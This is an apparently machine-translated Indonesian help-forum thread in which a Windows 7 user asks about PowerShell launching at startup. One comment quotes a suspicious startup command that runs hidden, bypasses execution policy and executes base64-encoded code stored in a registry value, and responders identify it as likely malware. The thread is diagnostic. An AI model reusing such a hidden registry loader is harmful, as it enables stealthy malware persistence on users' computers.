Sebuah skrip terus bermunculan saat startup?

0

Jadi, saya me-restart seluruh sistem saya dua hari yang lalu dan setelah menginstal semua perangkat lunak yang saya butuhkan saya menyadari bahwa setiap kali saya menyalakan PC saya ada sesuatu yang berjalan di start bar. Saya segera memeriksa apa itu sebelum menghilang dan itu Windows PowerShell.

Dapatkah seseorang menjelaskan kepada saya mengapa ini berjalan ketika saya menyalakan PC saya, dapatkah saya / saya harus mencoba menghentikannya dan dapatkah itu menyebabkan masalah?

windows-7 powershell user566035
sumber
4
Gunakan Autoruns untuk menentukan nama file untuk skrip. Suatu proses mungkin mulai yang menjalankannya, jadi Anda harus mengetahuinya, adalah mungkin untuk mengetahuinya hanya akan membutuhkan banyak usaha di pihak Anda.
Ramhound
1
Kedengarannya seperti malware bagi saya
Moab
Terlihat terkait dengan security.stackexchange.com/questions/100020/…
David d C e Freitas

Jawaban:

-1

Periksa folder startup Anda (di windows 7: mulai & gt; semua program & gt; startup). Periksa juga tab startup msconfig untuk melihat apa yang ada di sana. (Tombol Windows + R untuk jendela Jalankan, ketik msconfig)

edthepenguin
sumber
Folder startup kosong karena suatu alasan dan dalam msconfig dikatakan bahwa pabrikannya adalah Microsoft dan perintahnya sangat besar, saya akan menuliskannya di sini. C: /Windows/system32/WindowsPowerShell/v1.0/powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Penyandian Teks] :: ASCII.GetString ([Konversi] :: FromBase64String ((gp'HKCU: / Software): /Classes/EoIVcf').JNJJREXKMCTP))))); Haruskah saya menghentikan proses ini di msconfig di bagian startup dan apakah ini akan mengubah sesuatu secara drastis?
user566035
Anda dapat menonaktifkannya sementara di msconfig untuk melihat apakah memengaruhi proses lain, itu tidak akan memengaruhi windows memulai. Saya tidak yakin apa kunci registri yang ditunjukkannya, mungkin orang lain dapat membantu di sana.
edthepenguin
Saya mematikannya di msconfig dan menjalankan pc saya lagi dan tidak ada yang aneh terjadi, saya kira itu tidak terhubung ke perangkat lunak penting. Saya memang melihat opsi ketika saya menginstal Daemon Tools dan WinRar tentang menginstal shell. Mungkinkah itu?
user566035
2
Sepertinya malware bagi saya. Ini base64 disandikan untuk menyembunyikan kode yang sedang berjalan. Perintah itu berarti: jalankan isi entri registri JNJJREXKMCTP di bawah kunci HKCU: \ Software \ Classe s \ EoIVcf Anda dapat mendekodekannya sendiri dengan membuka PowerShell dan menempelkannya [Text Encoding]::ASCII.GetString([Convert]::FromBase64String((gp'HKCU:\Software\Classe‌​s\EoIVcf').JNJJREXKMCTP))). Mungkin semacam dropper yang mengunduh dan menginstal malware di komputer Anda. Pastikan untuk memindai infeksi PC Anda.
megamorf